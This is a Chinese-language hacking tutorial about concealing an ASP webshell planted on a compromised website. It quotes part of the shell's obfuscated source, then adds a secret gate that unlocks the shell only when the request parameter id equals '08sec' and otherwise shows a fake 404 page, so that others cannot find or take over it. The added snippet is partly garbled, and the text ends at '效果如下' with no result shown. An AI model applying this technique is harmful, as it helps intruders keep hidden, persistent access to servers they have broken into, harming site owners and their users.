我们首先以一个大马为例这个大马是没有密码的，只要知道地址就可以进去了

    或者你的大马有密码但是被人为添加了后门，但比较隐秘，完全清除很难，我们就可以用下列方法来进行处理，

另类隐藏保护asp大马地址方法

    如何加上密码让他人进不来呢？

    有些人直接加个登陆界面，人家一看就知道这是大马，还可以猜密码，我的方法就与众不同

    首先我们来看看他的一部分源码

    <%

    'pue=true

    server.scripttimeout=600

    UserPass="login"

    response.buffer = true

    Response.Expires = -1

    Session.Timeout=60

    Const wwj="NET WORK SYSTEM"

    Const jlt="WEB TESTER'S SYSTEM"

    Const qk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf"

    Const pnf=true

    Const rfd=33

    Const yqo="dsmfk"

    Const gco="_"

    Const fgb="want_pre.asp"

    Const righthz="_request_send_sumbit_include_reel_open_form_month_data"

    public br,pbwell,juppath,foldermax,maxpath

    foldermax=0

    dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz

    jki= Clng("&H0")

    for i=0 to 12

    cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&","

    jki=jki+1118481

    colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000"

    cl=split(colors,",")

    怎样进行处理呢?

    我在前面加上了

    <%

    if request("id")="08sec" then

    session("ISUSER00")= "TRUE"

    end if

    %>

    <%

    response.write("

HTTP/1.1 404 Not Found

    Response.End

    end if

    %>

    这段代码的意思是

    如果返回的id是08sec的话就添加一个session isuser00的值为true

    如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found

    如果不是就执行下面的代码

    所以我们的大马就被保护起来了

    效果如下：